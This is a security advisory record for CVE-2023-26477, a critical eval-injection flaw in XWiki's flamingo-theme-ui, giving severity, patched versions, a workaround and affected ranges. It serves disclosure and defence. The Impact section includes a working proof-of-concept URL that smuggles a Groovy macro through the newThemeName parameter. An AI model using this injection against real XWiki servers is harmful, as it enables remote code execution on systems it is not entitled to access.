GHSA-x2qm-r4wx-8gpg

Source

https://github.com/advisories/GHSA-x2qm-r4wx-8gpg

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/03/GHSA-x2qm-r4wx-8gpg/GHSA-x2qm-r4wx-8gpg.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-x2qm-r4wx-8gpg

Aliases

CVE-2023-26477

Published

2023-03-03T22:51:02Z

Modified

2023-11-08T04:12:01.718825Z

Severity

10.0 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H CVSS Calculator

Summary

org.xwiki.platform:xwiki-platform-flamingo-theme-ui Eval Injection vulnerability

Details

Impact

It's possible to inject arbitrary wiki syntax including Groovy, Python and Velocity script macros via the newThemeName request parameter (URL parameter), in combination with additional parameters form_token=1&action=create.

For instance: http://127.0.0.1:8080/xwiki/bin/view/FlamingoThemesCode/WebHomeSheet?newThemeName=foo%22%2F%7D%7D%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22hello%20from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D&form_token=1&action=create will execute the following groovy code: println("hello from groovy!") on the server.

Patches

This has been patched in the supported versions 13.10.10, 14.9-rc-1, and 14.4.6.

Workarounds

It is possible to edit FlamingoThemesCode.WebHomeSheet and manually perform the changes from the patch fixing the issue.

References

https://github.com/xwiki/xwiki-platform/commit/ea2e615f50a918802fd60b09ec87aa04bc6ea8e2#diff-e2153fa59f9d92ef67b0afbf27984bd17170921a3b558fac227160003d0dfd2aR283-R284
https://jira.xwiki.org/browse/XWIKI-19757

For more information

If you have any questions or comments about this advisory: * Open an issue in Jira XWiki.org * Email us at Security Mailing List

Database specific

{
    "nvd_published_at": "2023-03-02T18:15:00Z",
    "github_reviewed_at": "2023-03-03T22:51:02Z",
    "severity": "CRITICAL",
    "github_reviewed": true,
    "cwe_ids": [
        "CWE-94",
        "CWE-95"
    ]
}

References

Affected packages

Maven / org.xwiki.platform:xwiki-platform-flamingo-theme-ui

Package

Name: org.xwiki.platform:xwiki-platform-flamingo-theme-ui; View open source insights on deps.dev
Purl: pkg:maven/org.xwiki.platform/xwiki-platform-flamingo-theme-ui

Affected ranges

Type: ECOSYSTEM
Events: Introduced

6.2.4

Fixed

13.10.10

Maven / org.xwiki.platform:xwiki-platform-flamingo-theme-ui

Package

Name: org.xwiki.platform:xwiki-platform-flamingo-theme-ui; View open source insights on deps.dev
Purl: pkg:maven/org.xwiki.platform/xwiki-platform-flamingo-theme-ui

Affected ranges

Type: ECOSYSTEM
Events: Introduced

14.0

Fixed

14.4.6

Maven / org.xwiki.platform:xwiki-platform-flamingo-theme-ui

Package

Name: org.xwiki.platform:xwiki-platform-flamingo-theme-ui; View open source insights on deps.dev
Purl: pkg:maven/org.xwiki.platform/xwiki-platform-flamingo-theme-ui

Affected ranges

Type: ECOSYSTEM
Events: Introduced

14.5

Fixed

14.9-rc-1